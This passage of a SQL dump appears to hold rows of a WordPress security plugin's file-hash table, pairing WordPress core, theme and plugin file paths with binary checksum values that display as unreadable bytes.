\0\0\0\0\0\0\0\0','q*�aԙ�&Q�|z�','KŖ��#4O}�nJ�VD\n�r�)״T���e��b','',0,'?'),('��W���\"���Sk:�','wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�r�5*J7�If','�8tf�*Jw�T�^��H�>���1�JD�ο','',0,'?'),('����P�IcD��ƾ�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J�s��Ǚ�B','��ER��Jb�ȸI\"��t�],�qP�1\\fD','',0,'?'),('����x*�ñ�U���','wp-includes/block-patterns/two-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��_�w?V�:�g��C','w@�c|�h�(��Hz�X[�_�:�x��0�)K','',0,'?'),('�⣣�M�O����U�','wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I=k\Z���','�\\\\^�*k,;�_4�\'� oiU��@&e��','',0,'?'),('���\"�LJ1�C4ND�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ӝ�w�Yh�,�*�','�`c��LX����6��Im � B�]se��f�','',0,'?'),('���ӹ��`3�\n@ͅ4','wp-content/themes/weblog/acmethemes/hooks/slider-selection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x>̕^-����','�[V�!�AF\Z�\r�#{ �y6xE�/\n<�0��','',0,'?'),('���;�W����l�','wp-includes/js/dist/deprecated.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�v\"} �H���}��T','5\r�_��I��h�MJuk��Q�ͣ�չ���zn','',0,'?'),('�]:]6Q(s-�B��','wp-content/plugins/wp-cerber/assets/flags/so.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�:�vU:{��','I���˱�� -���f�rǏc�k��@�3�` =','',0,'?'),('�\n`m�H�I�i�M�','wp-content/themes/twentynineteen/inc/color-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�4�\Z���M��y','_{��g�g�|n�%�e��~�����sCi���B','',0,'?'),('�\"�ơ���7vs+�','wp-admin/includes/class-pclzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9MY�^mluRg','\0\rhV!\Z7\Z�虁�K`2�_\\H ��G\n�;=','',0,'?'),('�Djמ�8]fД_�','wp-includes/class-wp-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�� �B��Ի��','���/�����0�=�|{h��n�R�','',0,'?'),('�Tg;�\n�]�\"��&1�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-layouts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��tUa�~�\'�Ij�','���P����s��� �ڰ���x;́��2�','',0,'?'),('�b`K�\'��컜���K','wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�4ؒT�$�0B-�','x�89@��G��#���G�b}y\'�A����v','',0,'?'),('�w����f~��R�ލ','wp-content/themes/regina-lite/CHANGELOG.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�*�2�9eȪ��','ގ�lՐ�U�\"�6�՞RR��\'vlơ��\Z','',0,'?'),('�x�Δ)NX3u/@�4Y�','wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N���>�EH�I��� �','u).H����� �����C���HsԐ`$�','',0,'?'),('�|X�睭�(P>n�/�d','wp-content/themes/healthcare/post-nocontent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}Z�q�|>G����','�u����˿��=,(�^7i�| ���s�szY','',0,'?'),('�J��ёe�\rXd��$�','wp-includes/class-wp-customize-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���^Oި�����','�K�WC�-�v�l�w� ��R\Z�xS)[R�','',0,'?'),('�ҘG\"��:0�\\�KH#','wp-content/themes/twentytwentyone/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUZJ�k�\r=�q\'��','Pc����:�D3yN�o&�t*Ѱ�[��:kG\'�','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�#w:m���2��A\"','���^>�*���r���I+��{�ф�U�b�&�','',0,'?'),('�ʼn� i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H(@q���Tj��','�g��\n?#��\'^�\'d�8�\Zi��=\Z������','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pgG��&�3�,�','S����<�`�J��=�4mS�\"kY��Mׂҡ�','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�0�j8�2\n�s�','v��\\qY{S��<|+��{�(m��?)��D�=�','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��ٳ���v�2.','�ڷ���Rkd�NZ��h��V�\r�<p���=1','',0,'?'),('��sF�um���Ą��','wp-content/themes/weblog/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�VJ\0\'֟��,','z�E3�!3��wS|� ��ήY@q�U\n�*1G','',0,'?'),('��}�Woc�x�J�7��','wp-content/themes/advance/inc/kirki/includes/lib/class-aricolor.php',0,'u>�B���m��}��5�','u>�B���m��}��5�','��7\n�DQ��Kx���o%�&)�b�@;�e��ö','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)YMˍ�\\Ξ��\'','*�eG�P$����б�աmw&��:OL/1>N','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^
�','',0,'?'),('�i;�C�\n��2�F','wp-content/themes/regina-lite/layout/js/plugins.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�~�;�\rH4u\Z�','�4�S���x�tXZq�q��$��tb�uO','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W�� �3N�\Z��`x�hI�`�','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('�\0�]�p��ޑ� \rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+�D�8rnlU��','�U����2��#d�{���3��E8���U�','',0,'?'),('��tU;�56|�4Ql','wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Ԋ2�3�\\�:=�','�� �<�(*Wv���Ћtw��r_��t�i� ','',0,'?'),('��v�w\n�s�̨H5�','wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZNj�ک&��U��','B+1�E��}�n�7\Z�z�_��Q�̻�3�&','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�v��t��(4V','���a��_��Lx�c$��tU�v�����%��','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('�}d찎4�:��/�V','wp-content/themes/skt-toothy/images/sktskill.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��JY��z�_�6vJݜ','��OO+#��L�멒�D~��G�Ŷ�&ɗ','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z �\"�g��ߠ���;�=�D�ٗx','',0,'?'),('�\"�e��AlB�E�/','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vh�lZ��.�]m`q��`','Ȧ(�{r�E�(ug�_ ܹ k��\rP�`�8�c�','',0,'?'),('�D�C5 ����d��','wp-content/themes/wp-barrister/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o|8�+�z�Y��#�','U&2�l�u\'�䁮�o�嬇/n�{��t���','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/ ��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6*pO��,ё� -X�','�4|ǛD}c�Hd�Ɖ)Y[�q�K���-�','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j0�P�3#��','!K~�f���nN��B��\0��.@�K�U�','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� �\n�f@�!릶','wNT(��`x܌�P�C��1Ow�b�]��ъ�','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N���� rG�Ƭ���.','',0,'?'),('�A�*N<�Hݱ��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-customizer-navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}rP��vO:JH��\"�','���PH� -�0 K%B�]��5��N|e��','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�N���knT�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�\'����>�Y�','�b*/��m/���a�ŵ�>��I湒h��+','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('��+�<���@��v|#','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3���I�dX','EM���B����֗c�?�^7��s�4]��/�','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('� �1_E�67���','wp-content/themes/twentynineteen/sass/forms/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a|2]�e�\"$9z�','\0�Ó\rƱ6� �,�J ��!d7���n��h��','',0,'?'),('�U���b�f܌�`g','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[m�L̉Ȗ�j#�D','�����ۚr(o�Ek\"+/bW/r���p��1','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UݪAcT�g�@��{N','�XAݸ.`Q��rC����w@�4b�X���ϭ� ','',0,'?'),('�)����\'�����z)��','wp-content/themes/regina-lite/layout/js/custom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�8��V���\nJ��Ȏ�','�[��7/6֑\"���q�ԋ8v|�ζt�C','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�/��nC�0^`���','Y\'C5�\'g�u���**Ƭy�%R(�T�S����','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q �!�@�٧T\r',' �Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�Qi,%-聀A�ͮkS~','wp-content/themes/skt-toothy/images/footer-icon-phone.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>:�m�6k����5','K���qf~� �i|��%͕��f���}�','',0,'?'),('�Q�A� �=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('�^OAP���p�ߗ��_H','wp-content/themes/skt-toothy/images/img_404.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}A�<g�#�/e�,','��,��c�J�J�.�\\ss=}٬1�*z3�z�','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A\Z����w�d6[�','!��yq�� ����� ������#ҝ;\'','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K� 5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A^�I���4�B\'','ɗ(�|��m��F�EHS7��^��~#����','',0,'?'),('ꐏF�rH�}@$bF��-','wp-content/plugins/wp-cerber/assets/flags/dz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}����Z�A���','~\n����Ào�\'�x�\0��Xh.��}���%�','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('�ƺu�so{T�l��iIH','wp-content/themes/healing-touch/css/style_base.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5r�>�Bn��\"','4T��G։�ZQ���)����]إ�','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˈ0@�8�����_B','�r�dy��#�G����}����ZӦtwW�S','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('�����d~�D5G\n','wp-content/themes/doctors/core/customizer/help/_background_color_alt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߞ?l8<ia�\rW#��','4��?J�o��3���*��䍜��N�ą�','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� ','pX���uc{�-�Kژ�/OnE0���)JB','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lGfBp�X0=�aESy','�qǼ<�x��Ӡ�A��X/rUCG�lW�\n*e','',0,'?'),('�6*����p\\FVfPT','wp-content/themes/regina-lite/layout/images/home/testimonial-quote.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\"S�<��?o����:','^ֆL�!H��\0//�B��f0.�d�n�գ@���','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�) �>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{`�q���\'2P','Wf�y�����7hc��ajkgd�4��8�ɢ��','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�s��Zz�`x�mf: ','wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���]��c��ț��&','mrO�z�Iy�Dz��q�v�˘qZ�����i�','',0,'?'),('�{\rՍ.0��`�On��','wp-admin/images/about-header-brushes.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�:Uy-�ܴ#','��{�kZxS?�t\"Q���?�(�n�r3��','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5w�pأ����','3ֳ���}��!p�B����A����)k�{�F�','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�L��g�a�J\\','��)��v5i�B�:#��%����N�����','',0,'?'),('���F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('��(ܲ���S\r\"�^A:B','wp-content/themes/doctors/core/assets/images/swipebox/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Au��GaR$+~-�8�','�U\\N��rQ��g���4��s��{pr+5�qd�%','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xS���v�N���','�� u�����yA�Ү�B���(��B6�����','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Iu,�I��WN�7','<�P�ёxC�eo�I)O_d�/�wg�w�1�','',0,'?'),('��\r�nlB���<�','wp-content/themes/skt-toothy/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'� s !E�;','�Btv��e�5�oi��}�v������y','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('�+��^�њ��\r�k','wp-content/plugins/wp-cerber/assets/flags/is.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4o�$�^z1�T�ɪ�','�XƠ8�\'��*ӱ4�$���G\"��JD8�@�6','',0,'?'),('�8C*�©˴����','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/class-epsilon-autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','鼜�F}g?Lߛ�l�','&��%G���CIy\ZƠ�T�bv��]�?��','',0,'?'),('�4)�Թ�ӝ��{���','wp-content/themes/doctors/core/contents/loop_tag/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�︪�� \r龧','�=.E*r3Yz���~��zXV~Y���.(b��','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 24�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�8�\Z���|�Vk���F','wp-content/themes/doctors/core/customizer/help/_border_color_alt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*���[ܿHMi�!&�','�t�`�=n�r/_�{)��g�L�QFn�','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�V���A`\"�1=�i','wp-content/plugins/redirection/modules/nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'MwflOt�?d','���&L�hQ�Z���j����b�aX3�il:����','',0,'?'),('�}(^��8,~hyg���','wp-content/plugins/wp-cerber/wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[k�nG���ˡ\"14a','��)Y�.=��E)�#�V W8!E7LOl�','',0,'?'),('�|�`y�YĶ�����o','wp-content/themes/twentytwentyone/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��446ZN�p���T','=SmV��5�9�H�bS�V�u��b��:r�?���','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8�� ','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('칫Ǡ/j���m�l{','wp-content/themes/healthcare/css/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��⸹{�HJ��H�ӆ','�a�S��o���l���3��d��`u�m','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�@ަ�$����,','�dٍ|�]���Q��!�Qw����;���`7Zf','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�I5�)��JD��\\','��w5ޏ���+>�c\r����^⽍B�]�','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('�ͬ!�QV�;��@��.','wp-content/themes/regina-lite/layout/js/plugins/pace/pace.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��۬�v*\\���','�Ml��j�6(p���o�ڲ�K���O�!�6�','',0,'?'),('��j*Q�0l�W���yn','wp-content/themes/doctors/core/includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l[���SJቋ�$%T','U�ӪI���yM�W咫G���$�J�_A','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}���nBJw�k�0','��,�In����\n���E,��@�h�1����','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ofl��A�7�A���','�L���9w����v�G�hK!g�n��g�Cd','',0,'?'),('�ȋ�t=����F\\','wp-content/themes/regina-lite/layout/images/home/testimonial-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�� \Z;G��nE','܈M�5�A}�VѬ�uT�*;���tJ�w�lF','',0,'?'),('�4����E\"\nmB*ȇ','wp-content/plugins/redirection/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X���� #����#�','',0,'?'),('�<��(���ߪ�-�n,','wp-content/themes/weblog/acmethemes/customizer/options/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�n�\'z�n��l�','��@[���h�m�,�2��I���SIז','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�OR(ǹ����O��','wp-content/themes/twentytwenty/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�S�a�N���x0�e\\','\ZY_��tz�)8��b#���D}%]��Dmy��YV�','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}d��D��TN�\"F�','F�ԝ�q��`�멾���r_���Ȩ_���\'��I','',0,'?'),('�j����G���w��k','wp-content/themes/wp-barrister/content-people.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�:�։w�럙+x�','X9��]M��\'�R8#�֥��< 